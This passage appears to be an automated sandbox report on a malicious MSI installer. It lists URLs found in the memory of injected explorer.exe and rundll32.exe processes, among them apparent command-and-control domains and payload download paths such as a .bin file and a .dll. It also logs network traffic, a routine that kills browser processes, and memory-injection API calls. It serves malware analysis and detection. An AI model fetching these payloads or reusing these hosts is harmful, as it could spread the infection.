Source: explorer.exe, 00000009.00000003.3460642959.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3460184763.000000000CB51000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461113285.000000000132C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4139893118.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4137653030.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3460184763.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461404501.000000000CB92000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/
Source: explorer.exe, 00000009.00000002.4137653030.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/3p
Source: explorer.exe, 00000009.00000002.4137653030.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/6122658-3693405117-2476756634-1002
Source: explorer.exe, 00000009.00000003.3460642959.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4139893118.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3460184763.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461404501.000000000CB92000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/=
Source: explorer.exe, 00000009.00000003.3461113285.000000000132C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/A
Source: explorer.exe, 00000009.00000003.3461113285.000000000132C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/V=
Source: explorer.exe, 00000009.00000003.3461113285.000000000132C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/est/-
Source: explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/est/mX
Source: explorer.exe, 00000009.00000003.3460642959.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3460184763.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461404501.000000000CB92000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/gs
Source: explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/st/
Source: explorer.exe, 00000009.00000003.3460642959.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2935138310.0000000003460000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4125816199.000000000308D000.00000004.00000010.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3462458492.000000000C98F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461113285.000000000132C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3116501774.0000000008FB0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3165319740.0000000003460000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4139642747.000000000CA4F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4139893118.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3460184763.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3188591617.0000000008830000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3210130815.0000000008B70000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461404501.000000000CB92000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/
Source: explorer.exe, 00000009.00000003.3460642959.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4139893118.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3460184763.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461404501.000000000CB92000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/-
Source: explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/1b87bd06
Source: explorer.exe, 00000009.00000002.4125057147.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461113285.000000000132C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3618284131.0000000001332000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/Q
Source: explorer.exe, 00000009.00000003.3460184763.000000000CAB3000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/p
Source: explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/vider
Source: explorer.exe, 00000009.00000002.4137653030.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2056295568.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: rundll32.exe, 00000005.00000002.4125203904.0000023CD8B80000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049440069.0000023CD8B80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com/
Source: rundll32.exe, 00000005.00000002.4125203904.0000023CD8B80000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049440069.0000023CD8B80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com/a
Source: rundll32.exe, 00000005.00000002.4125203904.0000023CD8B80000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2809051343.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049378900.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4125113963.0000023CD8B0F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4125363577.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049440069.0000023CD8B80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com:6542/stop.php
Source: rundll32.exe, 00000005.00000003.2049378900.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com:6542/stop.phpF
Source: rundll32.exe, 00000005.00000002.4125203904.0000023CD8B80000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049440069.0000023CD8B80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com:6542/stop.phpl
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000009.00000000.2052116683.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000009.00000002.4137653030.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2056295568.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000009.00000002.4137653030.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2056295568.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000009.00000003.3618362462.0000000009976000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4137653030.000000000C54A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3105045961.000000000CB53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3113818155.000000000132C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/
Source: explorer.exe, 00000009.00000003.3618362462.0000000009976000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/=
Source: explorer.exe, 00000009.00000003.3460184763.000000000CAB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4139756497.000000000CAB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3105045961.000000000CAB3000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/files/stkm.bin
Source: explorer.exe, 00000009.00000003.3460184763.000000000CAB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4139756497.000000000CAB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3105045961.000000000CAB3000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/files/stkm.binbm
Source: explorer.exe, 00000009.00000003.2935138310.0000000003460000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4137653030.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3460913739.000000000CB29000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4139833595.000000000CB29000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3116501774.0000000008FB0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3165319740.0000000003460000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3188591617.0000000008830000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3105045961.000000000CB18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3210130815.0000000008B70000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3460184763.000000000CB29000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3113784503.000000000CB22000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/
Source: explorer.exe, 00000009.00000003.3210130815.0000000008B70000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/1424693_495962074200_3017094URLS1https://dogirafer.com/test/3578852_8133
Source: explorer.exe, 00000009.00000002.4137653030.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/32.dll
Source: explorer.exe, 00000009.00000003.2935138310.0000000003460000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/3426159_38935932553563_5901982URLS1https://dogirafer.com/test/8447341_42
Source: explorer.exe, 00000009.00000003.3188591617.0000000008830000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/4782396_3336673150375_5876994URLS1https://dogirafer.com/test/7951999_661
Source: explorer.exe, 00000009.00000003.3116501774.0000000008FB0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/5865723_17335797906044_2080493URLS1https://dogirafer.com/test/5205754_80
Source: explorer.exe, 00000009.00000003.3165319740.0000000003460000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/7765524_55360872352224_4448453URLS1https://dogirafer.com/test/604857_961
Source: explorer.exe, 00000009.00000002.4137653030.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/v
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000009.00000000.2056295568.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4137653030.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000009.00000002.4137653030.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2056295568.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: https://www.advancedinstaller.com
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000009.00000000.2052116683.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000009.00000002.4127934640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: https://www.thawte.com/cps0/
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: https://www.thawte.com/repository0W

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50052 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49929
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown	Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown	Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49914
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown	Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown	Network traffic detected: HTTP traffic on port 50054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50051
Source: unknown	Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988

Source: unknown	HTTPS traffic detected: 104.21.16.251:443 -> 192.168.2.4:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.251:443 -> 192.168.2.4:49914 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.4:49967 version: TLS 1.2

E-Banking Fraud

Checks if browser processes are running

Source: C:\Windows\explorer.exe	Code function: CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle, chrome.exe		9_2_0B8D4948
Source: C:\Windows\explorer.exe	Code function: CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle, iexplore.exe		9_2_0B8D4948

Abnormal high CPU Usage

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Windows\System32\rundll32.exe	Code function: 5_3_0000023CDA68D326 NtProtectVirtualMemory,	5_3_0000023CDA68D326
Source: C:\Windows\System32\rundll32.exe	Code function: 5_3_0000023CDA68D2B6 NtAllocateVirtualMemory,	5_3_0000023CDA68D2B6
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4871B0 NtClose,	5_2_0000023CDA4871B0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA498149 NtSetContextThread,	5_2_0000023CDA498149
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA481600 NtClose,RtlExitUserThread,	5_2_0000023CDA481600
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA497A50 NtSetContextThread,	5_2_0000023CDA497A50
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4817B0 NtClose,NtClose,	5_2_0000023CDA4817B0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4B4740 NtFreeVirtualMemory,	5_2_0000023CDA4B4740
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4B3F40 NtAllocateVirtualMemory,	5_2_0000023CDA4B3F40
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4B4360 NtCreateThreadEx,	5_2_0000023CDA4B4360
